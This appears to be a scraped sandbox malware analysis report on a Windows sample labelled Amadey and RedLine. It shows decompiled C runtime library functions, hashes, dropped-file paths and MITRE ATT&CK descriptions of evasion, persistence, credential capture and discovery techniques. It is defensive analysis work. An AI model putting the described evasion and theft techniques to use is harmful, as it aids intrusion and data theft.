Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 02DA5F67 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02DA5FBB
_memset.LIBCMT ref: 02DA5FD6
_fseek.LIBCMT ref: 02DA6044

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction ID: 1205b13d83a703dca180606d6a6ea102b0d4d24b774712f11186f75990934abe
Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction Fuzzy Hash: F841BA72604B11CBDB30862DA925F1773E9DF80358F280A1DE5A6867D0E771ECC5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 02DABD11 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 02DABDD5
__fileno.LIBCMT ref: 02DABDF5
__locking.LIBCMT ref: 02DABDFC
__flsbuf.LIBCMT ref: 02DABE27

Part of subcall function 02DAC228: __getptd_noexit.LIBCMT ref: 02DAC228

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: __fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 1291973410-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 2a4156406f5d32dffd3b24fa8624235f237cb389d5d16adbe4efa19671007a52
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: EC41D831A00604EFDF149F6988A0DAEBBB6EFA0728F24862AD45697340D771DE52CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004152a9
0x004152b0
0x004152c7
0x00000000
0x004152b7
0x004152b9
0x004152d3
0x004152d8
0x004152db
0x004152de
0x00415307
0x0041530e
0x00415310
0x00415391
0x004153ac
0x004153ae
0x004152ee
0x004152ee
0x004152f1
0x004152f3
0x004152f6
0x004152f6
0x004152f6
0x004152f6
0x00000000
0x004152fc
0x00415370
0x00415370
0x00415375
0x0041537b
0x0041537e
0x00415380
0x00415383
0x00415383
0x00415383
0x00415383
0x00000000
0x00415387
0x00415312
0x00415315
0x0041531b
0x0041531e
0x00415345
0x00415348
0x0041534e
0x00000000
0x00000000
0x00415350
0x00415353
0x00000000
0x00000000
0x00415355
0x00415355
0x0041535b
0x0041535e
0x004152cc
0x004152cc
0x00415367
0x00000000
0x00415367
0x00415320
0x00415323
0x00000000
0x00000000
0x00415327
0x00415338
0x0041533e
0x00415340
0x00415343
0x00000000
0x00000000
0x00000000
0x00415343
0x004152e0
0x004152e3
0x004152e5
0x004152eb
0x004152eb
0x00000000
0x004152bb
0x004152bb
0x004152c0
0x004152c4
0x004152c4
0x00000000
0x004152c0
0x004152b9

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Uniqueness

Uniqueness Score: -1.00%

Function 02DB5506 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02DB553A
__isleadbyte_l.LIBCMT ref: 02DB556E
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02DB559F
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02DB560D

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 8827fa3287db6a81668ea3b9df2a8e82144c73327f6fb2cf7b4444c68013d5ec
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: B5319331910285EFDB12DF64E8A4EFE3BE6EF01316F944569E4668B2A0E731DD40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004134e0
0x004134e6
0x00413559
0x00000000
0x004134ed
0x004134ed
0x004134f0
0x0041350b
0x0041350e
0x0041352e
0x00413540
0x00413510
0x00413510
0x00413513
0x00000000
0x00413515
0x00413527
0x00413527
0x00413513
0x0041355e
0x00413562
0x004134f2
0x0041350a
0x0041350a
0x004134f0

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Uniqueness

Uniqueness Score: -1.00%

Function 02DB3742 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 02DB3768

Part of subcall function 02DB358D: __fltout2.LIBCMT ref: 02DB35B9

__cftog_l.LIBCMT ref: 02DB378E
__cftoe_l.LIBCMT ref: 02DB37C0

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 20c8821b8652f06f47dca5a4ea9571ae6f5e175e9a8dff331da0b0e739d1172e
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 82115B7200018AFBCF535E88CC658EE3F62BF08254B488595FA1A59630D732C9B1FB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SzznpUhIjo.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bus7600.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\con1165.exe.log

C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe

C:\Users\user\AppData\Local\Temp\IXP002.TMP\dNT35s70.exe

C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe

C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe

C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe

Static File Info

General

Windows Analysis Report
SzznpUhIjo.exe

Function 00403BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Function 00401AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Function 0040597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Function 00404FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Function 00402F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Function 00405467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Function 00402390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Function 00402BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Function 0040202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre